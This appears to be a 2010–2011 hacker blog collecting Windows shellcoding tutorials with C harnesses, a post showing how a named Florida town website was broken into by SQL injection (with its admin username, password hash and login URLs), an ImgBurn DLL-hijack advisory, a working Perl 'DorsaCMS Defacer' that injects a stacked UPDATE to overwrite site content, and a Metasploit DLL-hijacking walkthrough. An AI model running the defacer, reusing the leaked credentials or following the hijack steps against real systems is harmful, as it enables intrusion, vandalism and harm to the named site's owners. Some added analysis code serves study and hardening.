Tuesday, May 31, 2011

simple windows shellcoding

In this post I want to show a simple way of writing shellcode under Windows.

A debugger makes it quick to write and test shellcode. Do you remember the EXE-file injection method? There we look for an unused stretch of bytes in the executable, the code cave, write our assembly instructions into it, and then change the instruction pointer so that it points at the first byte of our code and runs it.

That is the method used here. Let's go!

I want to make a MessageBox shellcode that displays the text d3c0der. In assembly it is short:
xor eax,eax
xor ebx,ebx
xor ecx,ecx
xor edx,edx
MOV BYTE PTR SS:[EBP-7],64
MOV BYTE PTR SS:[EBP-6],33
MOV BYTE PTR SS:[EBP-5],63
MOV BYTE PTR SS:[EBP-4],30
MOV BYTE PTR SS:[EBP-3],64
MOV BYTE PTR SS:[EBP-2],65
MOV BYTE PTR SS:[EBP-1],72
push 0
LEA EBX,DWORD PTR SS:[EBP-7]
PUSH EBX
LEA ECX,DWORD PTR SS:[EBP-7]
PUSH ECX
push 0
MOV EAX,USER32.MessageBoxA
CALL EAX

The seven MOV BYTE PTR stores write the ASCII bytes of "d3c0der" (64 33 63 30 64 65 72) into the stack frame at [EBP-7] through [EBP-1]. The four pushes are the MessageBoxA arguments in right-to-left order: uType = 0, lpCaption = pointer to the buffer, lpText = the same pointer, hWnd = 0. Then the address of USER32.MessageBoxA is loaded into EAX and called.

To convert your own text (whatever you want the shellcode to show) to hex, an ASCII-to-hex converter such as http://centricle.com/tools/ascii-hex/ will do; for "d3c0der" it gives 64 33 63 30 64 65 72 (the original post shows a screenshot of this conversion).

The code cave area (screenshot in the original post).

Now I enter the code into the debugger (screenshot in the original post).

The first instruction, xor eax,eax, sits at address 01010D47; that is the address we will redirect EIP to.

Look at the registers window and note the current instruction pointer (screenshot in the original post). Go to that address and replace the "push 60" there with "JMP 01010D47" (screenshots in the original post).

Now run the program, and the d3c0der message box appears.

But there is a problem: null bytes. Shellcode that is delivered through a string copy must not contain 0x00, because the copy stops at the first one. Which part of our code produces them? "push 0" assembles to 6A 00. The old trick is to zero a register and push that instead:
xor ecx,ecx
push ecx
which assembles to 33 C9 51. With both pushes replaced, the final shellcode is:

xor eax,eax
xor ebx,ebx
xor ecx,ecx
xor edx,edx
MOV BYTE PTR SS:[EBP-7],64
MOV BYTE PTR SS:[EBP-6],33
MOV BYTE PTR SS:[EBP-5],63
MOV BYTE PTR SS:[EBP-4],30
MOV BYTE PTR SS:[EBP-3],64
MOV BYTE PTR SS:[EBP-2],65
MOV BYTE PTR SS:[EBP-1],72
xor ecx,ecx
push ecx
LEA EBX,DWORD PTR SS:[EBP-7]
PUSH EBX
LEA ECX,DWORD PTR SS:[EBP-7]
PUSH ECX
xor ecx,ecx
push ecx
MOV EAX,USER32.MessageBoxA
CALL EAX

Two things to keep in mind when reusing this stub. First, nothing terminates the string: the byte at [EBP] is whatever the caller's frame holds there (normally the saved EBP), so MessageBoxA may print trailing garbage after "d3c0der". Writing a zero there with MOV BYTE PTR SS:[EBP],AL does not help, because that instruction assembles with a mandatory zero displacement byte (88 45 00); instead put the string one byte lower, at [EBP-8], end it with MOV BYTE PTR SS:[EBP-1],AL (88 45 FF, null-free since EAX was already zeroed), and point the two LEAs at [EBP-8]. Second, MOV EAX,USER32.MessageBoxA is a hard-coded address (7E4507EA here), valid only for the user32.dll build this was tested on, XP SP3 English; on another service pack or language version the call lands somewhere else.


The test harness in C: the bytes go into a buffer and the buffer is called as a function. strlen stops at the first 0x00, so if the printed size is shorter than the real length a null byte crept in (with this string it prints 57).

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(){

    /* final MessageBox stub from above; B8 EA 07 45 7E = MOV EAX,7E4507EA (MessageBoxA on XP SP3 EN) */
    unsigned char shellcode[]=
    "\x33\xc0\x33\xdb\x33\xc9\x33\xd2"
    "\xc6\x45\xf9\x64\xc6\x45\xfa\x33\xc6\x45\xfb\x63\xc6\x45\xfc\x30"
    "\xc6\x45\xfd\x64\xc6\x45\xfe\x65\xc6\x45\xff\x72"
    "\x33\xc9\x51\x8d\x5d\xf9\x53\x8d\x4d\xf9\x51\x33\xc9\x51"
    "\xb8\xea\x07\x45\x7e\xff\xd0";

    /* strlen stops at the first 0x00: anything under 57 means a null byte slipped in */
    printf("Size = %u bytes\n", (unsigned)strlen((char *)shellcode));

    /* jump into the buffer */
    ((void (*)())shellcode)();

    return 0;
}

Because the stub stores into [EBP-7..EBP-1] of whatever frame it runs in, here main's, the buffer should not be the local that sits directly under the saved EBP, or the stores land on the stub's own last bytes before they execute; declaring it static avoids that. The harness also assumes the process may execute data (DEP off, or not enabled for it).

Test it and enjoy!
Good luck!
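An added example, not code from the original post: the checks I would run on a stub like this before pasting it into a harness. The two byte arrays are hand-assembled here from the two listings above (the "push 0" version and the fixed one); the code reports every null byte with its offset, replays the MOV BYTE PTR [EBP+disp8] stores against a fake frame to show that the string is written without a terminator, and emits the "\x33\xc0..." literal the harness expects.

```c
#include <stdio.h>
#include <stddef.h>
#include <string.h>

/* Both encodings of the MessageBox stub from this post, hand-assembled from the
   listings above (constructed for this example). sc_push0 still uses "push 0"
   (6A 00); sc_fixed uses "xor ecx,ecx / push ecx" (33 C9 51). */
static const unsigned char sc_push0[] = {
    0x33,0xc0, 0x33,0xdb, 0x33,0xc9, 0x33,0xd2,          /* xor eax/ebx/ecx/edx        */
    0xc6,0x45,0xf9,0x64, 0xc6,0x45,0xfa,0x33,            /* mov byte [ebp-7],'d' ...   */
    0xc6,0x45,0xfb,0x63, 0xc6,0x45,0xfc,0x30,
    0xc6,0x45,0xfd,0x64, 0xc6,0x45,0xfe,0x65,
    0xc6,0x45,0xff,0x72,                                 /* ... mov byte [ebp-1],'r'   */
    0x6a,0x00,                                           /* push 0      <-- 0x00       */
    0x8d,0x5d,0xf9, 0x53,                                /* lea ebx,[ebp-7]; push ebx  */
    0x8d,0x4d,0xf9, 0x51,                                /* lea ecx,[ebp-7]; push ecx  */
    0x6a,0x00,                                           /* push 0      <-- 0x00       */
    0xb8,0xea,0x07,0x45,0x7e,                            /* mov eax,7E4507EAh (MessageBoxA, XP SP3 EN) */
    0xff,0xd0                                            /* call eax                   */
};
static const unsigned char sc_fixed[] = {
    0x33,0xc0, 0x33,0xdb, 0x33,0xc9, 0x33,0xd2,
    0xc6,0x45,0xf9,0x64, 0xc6,0x45,0xfa,0x33,
    0xc6,0x45,0xfb,0x63, 0xc6,0x45,0xfc,0x30,
    0xc6,0x45,0xfd,0x64, 0xc6,0x45,0xfe,0x65,
    0xc6,0x45,0xff,0x72,
    0x33,0xc9, 0x51,                                     /* xor ecx,ecx; push ecx      */
    0x8d,0x5d,0xf9, 0x53,
    0x8d,0x4d,0xf9, 0x51,
    0x33,0xc9, 0x51,
    0xb8,0xea,0x07,0x45,0x7e,
    0xff,0xd0
};

/* Scan sc for any byte in the bad set; record up to max offsets, return the
   total count. A count of 0 is what a string-delivered payload needs. */
static size_t find_bad_bytes(const unsigned char *sc, size_t n,
                             const unsigned char *bad, size_t nbad,
                             size_t *offsets, size_t max)
{
    size_t found = 0;
    for (size_t i = 0; i < n; i++)
        for (size_t j = 0; j < nbad; j++)
            if (sc[i] == bad[j]) {
                if (found < max) offsets[found] = i;
                found++;
                break;
            }
    return found;
}

/* Replay the "mov byte ptr [ebp+disp8], imm8" stores (C6 45 disp imm) against a
   fake frame whose [ebp] slot is frame[ebp_index]. A pattern scan, not a
   disassembler, which is enough for this stub. Returns the stores applied. */
static int apply_byte_stores(const unsigned char *sc, size_t n,
                             unsigned char *frame, size_t ebp_index, size_t frame_len)
{
    int stores = 0;
    for (size_t i = 0; i + 3 < n; i++) {
        if (sc[i] != 0xc6 || sc[i + 1] != 0x45) continue;
        long slot = (long)ebp_index + (signed char)sc[i + 2];
        if (slot < 0 || (size_t)slot >= frame_len) continue;
        frame[slot] = sc[i + 3];
        stores++;
        i += 3;
    }
    return stores;
}

/* Emit the bytes as a C string literal ("\x33\xc0..."), the form the harness
   above wants. Returns the literal's length, or -1 if out is too small. */
static int dump_c_string(const unsigned char *sc, size_t n, char *out, size_t outlen)
{
    size_t used = 0;
    if (outlen < 3) return -1;
    out[used++] = '"';
    for (size_t i = 0; i < n; i++) {
        if (used + 6 > outlen) return -1;            /* \xNN + closing quote + NUL */
        used += (size_t)snprintf(out + used, outlen - used, "\\x%02x", sc[i]);
    }
    out[used++] = '"';
    out[used] = '\0';
    return (int)used;
}

int main(void)
{
    const unsigned char nul = 0x00;
    size_t off[8];
    size_t bad = find_bad_bytes(sc_push0, sizeof sc_push0, &nul, 1, off, 8);
    printf("push 0 version: %zu bad byte(s)", bad);
    for (size_t i = 0; i < bad && i < 8; i++) printf(" at offset %zu", off[i]);
    printf("\nfixed version: %zu bad byte(s)\n",
           find_bad_bytes(sc_fixed, sizeof sc_fixed, &nul, 1, off, 8));

    unsigned char frame[32];
    memset(frame, 0xcc, sizeof frame);               /* 0xCC = "whatever was there" */
    apply_byte_stores(sc_fixed, sizeof sc_fixed, frame, 16, sizeof frame);
    printf("bytes at [ebp-7..ebp-1]: %.7s, then [ebp] = 0x%02x (no terminator written)\n",
           (const char *)frame + 9, frame[16]);

    char lit[512];
    if (dump_c_string(sc_fixed, sizeof sc_fixed, lit, sizeof lit) > 0)
        printf("unsigned char shellcode[] = %s;\n", lit);
    return 0;
}
```

The bad-byte set is a parameter on purpose: for a payload that travels through a string copy 0x00 is the only hard constraint, but for one that goes through a text protocol you would also pass 0x0A and 0x0D, and the same scan tells you where to re-encode.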

Tuesday, February 8, 2011

win32/xp pro sp3 MessageBox shellcode 11 bytes

Windows MessageBox shellcode for XP Pro Service Pack 3. It calls MessageBoxA with all four arguments zero, which pops up a box titled "Error" (the default caption when lpCaption is NULL) with an empty body.



/*
Title: win32/xp pro sp3 MessageBox shellcode 11 bytes
Author: d3c0der - d3c0der[at]hotmail[dot]com
Tested on: WinXP Pro SP3 (EN)
website : Www.AttackerZ.ir
spt : All friends ;)
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* 33 D2           xor edx,edx
   52 52 52 52     push edx x4  -> hWnd, lpText, lpCaption, uType all 0
   E8 BE E9 44 7D  call rel32   -> MessageBoxA, relative to where code[] is loaded */
char code[] =   "\x33\xd2\x52\x52\x52\x52\xe8\xbe\xe9\x44\x7d";

int main(int argc, char **argv)
{
    ((void (*)())code)();

    return 0;
}



Test (screenshot in the original post).

Note that the CALL is relative: E8 with displacement 7D44E9BE only reaches MessageBoxA when code[] sits at the exact address it had in the author's build on that XP SP3 EN machine. Place the buffer anywhere else, or run on another user32.dll build, and the call goes somewhere else; that is the price of the 11-byte size. The MOV EAX,imm32 / CALL EAX form used in the May post is position-independent, though still tied to one user32.dll build.

Published at:
http://shell-storm.org/shellcode/files/shellcode-751.php
http://packetstormsecurity.org/files/view/98261/mbwin32-shellcode.txt
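An added example, not from the original post, that makes the position dependence of the E8 call concrete. It decodes the rel32 from the 11 bytes, works out the one load address of code[] for which the call reaches MessageBoxA, shows where the same bytes jump when loaded elsewhere, and re-encodes the call for a new address while checking that no null byte appears. The MessageBoxA address 7E4507EA is an assumption taken from the May 2011 post on the same XP SP3 EN box (its MOV EAX,USER32.MessageBoxA assembled to B8 EA 07 45 7E).

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* The 11 bytes from the post. */
static const unsigned char code[] = "\x33\xd2\x52\x52\x52\x52\xe8\xbe\xe9\x44\x7d";
#define CALL_OFF 6                      /* offset of the E8 opcode inside code[] */

/* Assumption for the worked numbers: MessageBoxA at 7E4507EA, the value the
   May 2011 post's MOV EAX,USER32.MessageBoxA assembled to on the same XP SP3 EN box. */
#define MSGBOXA_XP_SP3_EN 0x7E4507EAu

/* Little-endian 32-bit displacement at p. */
static int32_t read_rel32(const unsigned char *p)
{
    return (int32_t)((uint32_t)p[0] | (uint32_t)p[1] << 8 |
                     (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24);
}

/* Where an E8 CALL whose opcode sits at address `at` actually transfers to:
   the displacement is relative to the end of the 5-byte instruction. */
static uint32_t call_target(uint32_t at, const unsigned char *insn)
{
    return at + 5 + (uint32_t)read_rel32(insn + 1);
}

/* Inverse: the only load address of the stub for which its CALL reaches target. */
static uint32_t required_base(const unsigned char *sc, size_t call_off, uint32_t target)
{
    return target - 5 - (uint32_t)read_rel32(sc + call_off + 1) - (uint32_t)call_off;
}

/* Re-encode E8 rel32 for a stub placed at `at`; returns 0 if a 0x00 byte appears. */
static int encode_call(uint32_t at, uint32_t target, unsigned char out[5])
{
    uint32_t rel = target - (at + 5);
    out[0] = 0xe8;
    for (int i = 0; i < 4; i++) out[i + 1] = (unsigned char)(rel >> (8 * i));
    for (int i = 0; i < 5; i++) if (out[i] == 0x00) return 0;
    return 1;
}

int main(void)
{
    uint32_t base = required_base(code, CALL_OFF, MSGBOXA_XP_SP3_EN);
    printf("rel32 = %08x, so code[] must sit at %08x for the CALL to hit MessageBoxA\n",
           (uint32_t)read_rel32(code + CALL_OFF + 1), base);

    /* The same bytes loaded somewhere else, e.g. inside a 00400000-based image: */
    uint32_t elsewhere = 0x00403000u;
    printf("loaded at %08x the CALL lands on %08x instead\n",
           elsewhere, call_target(elsewhere + CALL_OFF, code + CALL_OFF));

    unsigned char c[5];
    int ok = encode_call(elsewhere + CALL_OFF, MSGBOXA_XP_SP3_EN, c);
    printf("re-encoded for that address: %02x %02x %02x %02x %02x%s\n",
           c[0], c[1], c[2], c[3], c[4], ok ? "" : " (contains a null byte)");
    return 0;
}
```

Under the stated assumption the arithmetic puts code[] at 01001E21, i.e. the CALL opcode at 01001E27 and its end at 01001E2C, which is why a single recompile, a different image base or a different user32.dll breaks these 11 bytes even though they contain no absolute address.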

Sunday, February 6, 2011

how was the hillsboro beach website hacked?

A few weeks ago I read a news item on Fox News about an American website:

http://www.foxnews.com/scitech/2011/01/18/florida-communitys-website-targeted-iranian-hackers/

I went to the website and found the bug; in this post I want to show the vulnerability of this site :d

Let's go!
First, the home page (screenshot in the original post).

SQL error (screenshot in the original post).

Wrong number of selected columns (screenshot in the original post): the error you get while matching the column count for a UNION SELECT.

Showing the MySQL version (screenshot in the original post).

Username and password :d (screenshot in the original post):

user : tohbadministrator
pass : 481a91595db92d57

And the login pages:
http://townofhillsborobeach.com/cmsadmin/index.php
http://townofhillsborobeach.com/ControlPanel/index.xsl

Good luck :p

Tuesday, January 4, 2011

ImgBurn 2.4.0.0 dll hijack vulnerability

ImgBurn could allow a remote attacker to execute arbitrary code on the system. The application does not specify a fully qualified path when it loads dwmapi.dll on Microsoft Windows, so the loader walks the DLL search order, which includes the current directory. By persuading a victim to open a specially crafted file from a WebDAV or SMB share with the vulnerable application, a remote attacker can place a library of that name next to the file and have it loaded and executed with the user's privileges.
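An added example, not code from ImgBurn or from the advisory: the vulnerable load pattern beside a hardened one. The path-building core is plain C and runs anywhere; the Windows API calls (LoadLibraryA, GetSystemDirectoryA, SetDllDirectoryA) are guarded by _WIN32. dwmapi.dll ships with Vista and later, so on XP there is no System32 copy to find and the search runs all the way to the current directory, the share the document was opened from; that is the situation the hardened loader closes. The sample system directory string in main is constructed for the non-Windows run.

```c
#include <stdio.h>
#include <stddef.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#endif

/* A bare module name ("dwmapi.dll") is what sends LoadLibrary through the
   search order; anything with a directory component is taken as given. */
static int is_bare_module_name(const char *name)
{
    return *name != '\0' && strchr(name, '\\') == NULL &&
           strchr(name, '/') == NULL && strchr(name, ':') == NULL;
}

/* Build "<sysdir>\<name>"; refuses names that are not bare (so "..\evil.dll"
   cannot walk out of System32). sysdir is expected without a trailing
   backslash, as GetSystemDirectoryA returns it. Returns 1 on success. */
static int build_system32_path(const char *sysdir, const char *name,
                               char *out, size_t outlen)
{
    if (!is_bare_module_name(name) || strstr(name, "..") != NULL) return 0;
    if (strlen(sysdir) + 1 + strlen(name) + 1 > outlen) return 0;
    snprintf(out, outlen, "%s\\%s", sysdir, name);
    return 1;
}

#ifdef _WIN32
/* The pattern the advisory describes: bare name, default search order. When
   System32 has no dwmapi.dll (XP), the loader falls through to the current
   directory, i.e. the WebDAV/SMB share the victim opened the file from. */
static HMODULE load_vulnerable(void)
{
    return LoadLibraryA("dwmapi.dll");
}

/* Hardened: fully qualified path, and the current directory removed from the
   search order for any bare-name load that remains. On Windows 8+ (or 7 with
   KB2533623) LoadLibraryExA(name, NULL, LOAD_LIBRARY_SEARCH_SYSTEM32) gives
   the same guarantee without building the path by hand. */
static HMODULE load_hardened(const char *name)
{
    char sysdir[MAX_PATH], full[MAX_PATH];
    UINT n = GetSystemDirectoryA(sysdir, sizeof sysdir);
    if (n == 0 || n >= sizeof sysdir) return NULL;
    if (!build_system32_path(sysdir, name, full, sizeof full)) return NULL;
    SetDllDirectoryA("");
    return LoadLibraryA(full);
}
#endif

int main(void)
{
    char full[260];
    /* Constructed system directory for the non-Windows run of this example. */
    if (build_system32_path("C:\\WINDOWS\\system32", "dwmapi.dll", full, sizeof full))
        printf("would load: %s\n", full);
    printf("..\\evil.dll accepted? %d\n",
           build_system32_path("C:\\WINDOWS\\system32", "..\\evil.dll", full, sizeof full));
#ifdef _WIN32
    HMODULE h = load_hardened("dwmapi.dll");
    printf("hardened load: %s\n", h ? "ok" : "not present (expected on XP)");
    (void)load_vulnerable;
#endif
    return 0;
}
```

The important property of the hardened version is that a missing DLL now fails closed (LoadLibraryA returns NULL for a path that does not exist) instead of being satisfied by whatever file of that name sits beside the document.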







IN THE NEWS :

https://www.governmentsecurity.org/latest-security-news/critical-vulnerability-in-imgburn.html
http://www.livehacking.com/2011/01/05/unpatched-hole-in-imgburn-disk-burning-application/
http://www.h-online.com/security/news/item/Unpatched-hole-in-ImgBurn-disk-burning-application-1163003.html
http://forums.cnet.com/7723-6132_102-512542.html
http://www.net-security.org/secworld.php?id=10397
http://www.esecurityplanet.com/headlines/article.php/3919281/Security-Vulnerability-Found-in-ImgBurn.htm
http://www.naked-security.com/nsa/185411.htm



Saturday, December 18, 2010

Vulnerability Management for Dummies

Vulnerability Management for Dummies arms you with the facts and shows you how to implement a successful Vulnerability Management program. Whether your network consists of just a handful of computers or thousands of servers distributed around the world, this 5-part book will help:
• Explain the critical need for Vulnerability Management (VM)
• Detail the essential best-practice steps of a successful VM Program
• Outline the various VM Solutions - including the pros & cons of each
• Highlight the award-winning QualysGuard VM solution
• Provide a 10-point checklist for removing vulnerabilities from your key resources

Thursday, December 16, 2010

DorsaCms SQL Injection Vulnerability

Dorsa is a CMS that holds a security certificate; you can see the certificate at this link:
http://dorsagroup.ir/ShowPage.aspx?page_=form&order=show&lang=1&sub=0&PageId=69&tempname=Other

But I found a blind SQL injection vulnerability in this CMS:
http://securityreason.com/exploitalert/9701
http://packetstormsecurity.org/files/view/96736/dorsacmsdefacer-sql.txt

The exploit below does not extract anything blindly: it appends a stacked UPDATE to the numeric PageID parameter of ShowPage.aspx, which overwrites the Comment column of the news table with the chosen text.

Exploit code (tested on Windows XP):


#!/usr/bin/perl
#d3c0der
use strict;
use warnings;
use HTTP::Request;
use LWP::UserAgent;

# console dressing (cmd.exe commands; the exploit was tested on Windows XP)
system('color a');
system('cls');
system('title DorsaCMS Defacer');
print q{
===================================================
-= ** =-
DorsaCMS Defacer

[+] Coded by d3c0der   =>  d3c0der@hotmail.com

[+] AttackerZ Under Ground Group  =>  wwW.Attackerz.iR
-= ** =-
===================================================


};

print "~# Target : ";
my $site = <STDIN>;
chomp $site;
print "~# PageID : ";
my $id = <STDIN>;
chomp $id;
print "~# Deface Text : ";
my $def = <STDIN>;
chomp $def;

if ( $site !~ /^http:/ ) {
    $site = 'http://' . $site;
}
if ( $site !~ /\/$/ ) {
    $site = $site . '/';
}
print "\n";

print "->hacking : $site\n";

# PageID is used unquoted in the query, so a stacked UPDATE can follow the id.
my @path1 = ("ShowPage.aspx?page_=news&lang=1&sub=0&PageID=$id update news set Comment='$def';--");

foreach my $ways (@path1) {

    my $final = $site . $ways;

    my $req = HTTP::Request->new( GET => $final );
    my $ua  = LWP::UserAgent->new();
    $ua->timeout(30);
    my $response = $ua->request($req);

}

# ${site} keeps the variable name from running into "ShowPage"
print "[-] now this url is hacked ${site}ShowPage.aspx?page_=news&lang=1&sub=0&PageID=$id\n";

##
# By d3c0der
##

Tuesday, December 14, 2010

DLL Hijacking with Metasploit

Step 1: Fire up Metasploit Express and load the exploit module (screenshot in the original post).

The module you are looking for is WEBDAV Application DLL Hijacker. It is currently in the 10 most recent disclosures as of September 14th 2010.

Step 2: Select your options. Here we are going to exploit PowerPoint! The module will create the file "HR.ppt" in the directory "TopSecret". When you are done setting your options, launch the attack (screenshot in the original post).

Metasploit Express launches the attack and provides you with a link to send to your target (screenshot in the original post).

Step 3: Have the target open your file and watch as you get a session (screenshot in the original post).

Step 4: Collect that loot! (screenshot in the original post)

Step 5: Well, the sky is the limit. I personally like to kill off AV.